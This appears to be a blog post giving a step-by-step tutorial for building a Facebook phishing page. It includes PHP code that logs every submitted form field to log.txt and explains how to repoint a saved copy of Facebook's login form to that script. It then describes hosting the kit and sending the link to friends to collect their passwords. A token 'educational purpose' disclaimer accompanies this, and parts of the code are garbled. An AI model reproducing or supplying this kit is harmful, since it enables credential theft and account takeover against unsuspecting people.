Public Point: Best way for Facebook Hacking

Best way for Facebook Hacking

Facebook hacking 

How to create facebook fake login page "Phishing Tutorial". From this tutorial you can save your account from hackers.

Disclaimer : Hacking is a crime. 

Don't use this tutorial to hack and blackmailing to innocent people. I am teaching it for educational purpose only and I will not be responsible for any damage done by you. So think before you Act.

Here we go. Lets create a Fake page of Facebook…
Here we will need 3 types of files for Facebook:

1. Create a php file with the name of login.php. This page have a main role to get the victim password.

2. Than you have to create index.html which is a fake html page similar to original Page of Facebook.

3. Photos, CSS, js files

Step 1. 

Creating a login.php file:

Open your notepad on your Desktop and  paste the following Coding Lines on the notepad. After pasting the code than you have to save the file with the name of  (login.php)

Code for the Page of login.php

header (‘Lcation:‘);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, “=”);
   fwrite($handle, $value);
   fwrite($handle, “\r\n”);
fwrite($handle, “\r\n”);

Step 2. 

Create index.html Page:

2.1-      First you have to open login page of Facebook. For open the Facebook page Click here .
             Then go to browser tab than click on File> save as/save page as> then save the page in your download folder.

Now check the downloaded file in your download folder.

There will be a one html file (Welcome to Facebook.htm)
And a folder (Welcome to Facebook_files) containing some pics, CSS files and JS files.(this folder contains 3rd type of files that i have mentioned above.) 

2.2-      Now open the html file with notepad (right click> open with> notepad)

Then press ctrl +F and search for action.
And than you will find a line as shown in screenshot.
Note: In case of some other sites may be you find more then one action word.
but you have to find out the exact  type of line as shown in screen shot.
Near which you will find a
 tag and =”post” something like that.

2.3-          Now replace the url written after action with the name of your php file created in step 1.


Now your fake page is ready….
Save it with name index.html

Step 3: 

Uploading on a Free Hosting Site:

1.    Now you have to add the links on free hosting site for that you have to sign up for a free hosting
Account. Click on following   This is the best site which is giving free hosting for your pages.

2. After creating Account, login there, then go to control panel> File Manager.

3.     Now remove the preexisting index.html file.

4.     Now click on upload files and then upload there index.html and login.php


5. Now click on New directory to make a new folder there and name it “Welcome to Facebook_files”

6. Now open the directory

“Welcome to Facebook_files”
and then upload all the files(css,js, photos) of folder Welcome to Facebook_files,which was downloaded with facebook page in step 2. 

Now your phishing page is ready to hack

7. Now give URL of Your index page to Your friends, as soon as they will login through Your created fake page, A new log.txt file will be created and  their password will be saved in that file.

Best of Luck Guys ;)

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